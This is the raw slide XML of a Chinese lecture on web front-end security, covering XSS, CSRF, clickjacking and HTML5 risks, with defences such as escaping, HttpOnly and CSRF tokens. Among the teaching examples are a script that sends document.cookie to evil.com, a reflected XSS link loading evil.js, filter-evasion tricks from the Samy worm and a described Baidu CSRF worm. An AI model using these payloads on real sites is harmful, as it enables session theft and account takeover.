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84" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="285" r:id="rId6"/>
    <p:sldId id="290" r:id="rId7"/>
    <p:sldId id="286" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="289" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="282" r:id="rId15"/>
    <p:sldId id="283" r:id="rId16"/>
    <p:sldId id="291" r:id="rId17"/>
    <p:sldId id="292" r:id="rId18"/>
    <p:sldId id="26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1" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="-10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8890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任意多边形 14"/>
          <p:cNvSpPr/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任意多边形 12"/>
          <p:cNvSpPr/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/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任意多边形 16"/>
          <p:cNvSpPr/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任意多边形 17"/>
          <p:cNvSpPr/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任意多边形 18"/>
          <p:cNvSpPr/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任意多边形 19"/>
          <p:cNvSpPr/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任意多边形 20"/>
          <p:cNvSpPr/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任意多边形 21"/>
          <p:cNvSpPr/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任意多边形 22"/>
          <p:cNvSpPr/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任意多边形 23"/>
          <p:cNvSpPr/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任意多边形 24"/>
          <p:cNvSpPr/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任意多边形 25"/>
          <p:cNvSpPr/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任意多边形 26"/>
          <p:cNvSpPr/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61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025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025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61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305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shade val="100000"/>
                <a:satMod val="150000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="bg1">
                <a:shade val="90000"/>
                <a:satMod val="375000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="bg2">
                <a:tint val="88000"/>
                <a:satMod val="40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 panose="05000000000000000000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410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 panose="05000000000000000000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950" indent="-228600" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 2" panose="05020102010507070707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745" indent="-228600" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent3"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 3" panose="05040102010807070707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455" indent="-210185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10055" indent="-210185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825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4230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hyperlink" Target="http://www.evil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netsecurity.51cto.com/art/201312/421917.ht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netsecurity.51cto.com/art/201312/421917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60848"/>
            <a:ext cx="8892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Web</a:t>
            </a:r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前端安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000" dirty="0" smtClean="0"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60648"/>
            <a:ext cx="1104900" cy="1047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92280" y="1484784"/>
            <a:ext cx="1524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创业印章</a:t>
            </a:r>
            <a:endParaRPr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404664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CSRF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1700808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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>概念： 跨站点请求伪造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Cross site Request Forgery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2780928"/>
            <a:ext cx="72728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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>本质：攻击者使用用户的身份去提交了请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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如果一个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不鉴权，那根本不需要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CSRF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，直接攻击就好了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~~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或者它根本就不重要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那么如何“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用用户的身份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”？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26064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2.1. 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用户的身份是什么？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692696"/>
            <a:ext cx="88924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一般用户身份或者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的鉴权都是通过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，或者类似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的机制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82047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关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cookie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Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>存储时间有自定义时间机制（存在本地），也有随浏览器关闭的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>时间机制（存在浏览器内存）；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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>是跟着域名走的，浏览器不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>发送的请求，都会去查找目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>的域名，查到了对应域名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>，再将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>附在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>里，然后封包。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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>的限制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cookie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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>的覆盖范围内才会发送出去。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Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>种在父域名，可以应用到子域名里，反之则不行。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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>的世界里不同端口视作同域名。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26064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使用用户的身份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1772816"/>
            <a:ext cx="87129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用户登录了目标站点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用户进入攻击站点，攻击站点自动发送目标站点的请求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该请求会带有目标站点已经存在的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信息，也就是伪造了用户的身份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35699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052736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Case A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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4221088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Case B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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31032" y="4941168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P3P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头可以支持跨域读写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26064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2.3 CSRF Worm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196752"/>
            <a:ext cx="8136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百度用户中心短消息功能存在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CSRF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漏洞：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用户中心发送短信息接口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http://msg.baidu.com/?ct=22&amp;cm=MailSend&amp;tn=bmSubmit&amp;sn=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用户账号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&amp;co=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消息内容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百度空间好友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数据泄露问题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http://frd.baidu.com/?ct=28&amp;un=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用户账号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&amp;cm=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FriList&amp;tn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bmABCFriList&amp;callback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gotfriends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/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/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	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个人去加好友，然后调好友空间接口获取好友，然后发送短信息给好友，内容里包括隐藏图片，自动发送请求去获取好友，并继续发短信息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26064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2.4 CSRF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防御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1268760"/>
            <a:ext cx="85689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验证码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用户体验极差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检查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Referer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--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不可靠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CSRF Token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--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要足够随机性，要注意消耗的问题，要注意不能被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xss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攻击从而窃取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CSRF Token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26064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点击劫持 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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clickjacking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1196752"/>
            <a:ext cx="87849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分类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iframe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、图片覆盖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拖拽劫持：将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draggable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Dom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target Dom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设置为隐藏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iframe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手机端：通过覆盖同样可以实现劫持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3573016"/>
            <a:ext cx="87849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防御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frame busting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smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t>if(top !== self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t>top.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204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Verdana" panose="020B0604030504040204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>要注意过滤不同域名的内容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26064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1412776"/>
            <a:ext cx="7776864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4.1  video, audio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属性可能发起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xss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攻击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4.2  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iframe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合理使用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sandbox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可以提高安全性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4.3  canvas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可以通过导入图片，通过算法自动识别验证码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4.4  CORS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设置不恰当可能导致安全隐患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4.5  web Storage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xss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攻击代码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99592" y="764704"/>
            <a:ext cx="63367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5400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Q &amp; A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" alt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4581128"/>
            <a:ext cx="6408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Thank you!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1. XSS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2. CSRF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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ClickJacking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4. about HTML5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26064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XSS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1412776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概念： 跨站脚本攻击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Cross Site Script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2636912"/>
            <a:ext cx="77768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分类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反射型 ： 需要诱使用户点击恶意链接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存储型 ： 将恶意脚本存储在服务器端，访问到该数据的其它用户会被攻击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Dom based XSS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通过修改页面的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节点达到攻击目的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5661248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本质：嵌入了脚本达到攻击目的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26064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  XSS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攻击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1196752"/>
            <a:ext cx="87849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1.1.1  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攻击例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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脚本代码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:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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php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endParaRPr lang="en-US" altLang="zh-CN" sz="2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	$input = $_GET["test"];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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	echo "&lt;div&gt;". $input . "&lt;/div&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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攻击链接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:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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http://www.a.com/test.htm?test="&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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src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=http://www.evil.com/evil.js&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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51520" y="2420888"/>
            <a:ext cx="6709451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0"/>
            <a:ext cx="896448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1.1.2  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更多攻击例子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/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buAutoNum type="arabicParenR"/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利用字符编码 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[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百度搜藏的一个攻击案例，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GBK/GB2312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编码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]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/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/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var  test = “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这里输出变量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”;  =&gt;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变量输出前会转义双引号，理论上不可能出现攻击。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/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/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%c1\”;alert(/XSS/);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=&gt; %c1\”;alert(/XSS/);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=&gt; %c1\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被认为是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Unicode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字符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/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buAutoNum type="arabicParenR" startAt="2"/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Base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标签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/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/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如果页面插入了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base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标签，则可以修改相对路径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/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/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&lt;base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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href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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>“http://www.evil.com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”/&gt;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/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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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src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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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x.js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”/&gt;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/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/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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Jquery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/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/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$(‘div’).html(‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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img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src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=# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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onerror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=alert(1) /&gt;’)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/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/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4) YUI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/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/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Yahoo.com/yui/examples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/…/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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xxx.html#navbar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=&lt;script&gt;alert(1)&lt;/script&gt;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/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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History.js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里 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html = ‘&lt;html&gt;&lt;body&gt;&lt;div&gt;’ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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fqstate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+ ‘&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;’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284984"/>
            <a:ext cx="628820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581128"/>
            <a:ext cx="6624736" cy="466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0"/>
            <a:ext cx="8424936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evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="36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sz="24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1.1.2  Cookie </a:t>
            </a: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劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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img.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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="http://www.evil.com/log?"+escape(document.cookie);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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1.1.3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模拟请求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1.1.4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识别用户安装的软件，从而针对软件挂马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try {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=new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ActiveXObject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('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XunLeiBHO.ThunderIEHelper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');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 catch (e){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异常了，不存在该控件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1.1.5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 applet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获取用户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51519" y="1628800"/>
            <a:ext cx="8390265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509120"/>
            <a:ext cx="8619358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26064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1.1.6  XSS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Worm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1196752"/>
            <a:ext cx="87849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2005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Samy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Kamkar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MySpace.com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XSS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蠕虫代码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 只允许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&lt;a&gt;,&lt;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&gt;&lt;div&gt;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 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&lt;div style="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background:url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('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javascript:alert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(1)')"&gt;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 屏蔽关键字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java\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nscript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3 )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禁用双引号： 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生成引号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String.fromCharCode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(34)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 禁用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innerHTML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onreadstatechange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eval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(‘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document.body.inne’+’rHTML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’)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5 )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源码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26064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  XSS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防御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1196752"/>
            <a:ext cx="8784976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1.2.1  cookie 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HttpOnly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Apache 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曾经支持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header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的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trace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，可将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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httponly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的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cookie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读出来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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en-US" altLang="zh-CN" dirty="0" smtClean="0"/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1.2.2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输出检查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Html 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转义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&amp;&lt;&gt;”/’ =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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htmlentities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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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htmlspecialchars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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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jquery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的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text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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JS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转义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=&gt; 	var  y = ‘”’ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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escapeDoubleQuote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($var) + ‘”’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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在事件里转义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=&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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onclick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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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funcA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(‘$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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var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’)”   =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>json_encode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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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css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里输出 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=&gt; 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不允许在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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css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输出变量 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=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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owsap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esapi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encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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26064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1.1.6  XSS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Worm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1196752"/>
            <a:ext cx="87849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2005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Samy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Kamkar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MySpace.com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XSS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蠕虫代码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 只允许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&lt;a&gt;,&lt;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&gt;&lt;div&gt;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 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&lt;div style="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background:url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('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javascript:alert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(1)')"&gt;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 屏蔽关键字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java\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nscript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3 )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禁用双引号： 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生成引号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String.fromCharCode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(34)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 禁用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innerHTML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onreadstatechange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eval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(‘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document.body.inne’+’rHTML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’)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5 )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源码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0</TotalTime>
  <Words>3289</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>265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Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Meiryo</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>穿越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212</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-24T11:31:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-24T11:31:58Z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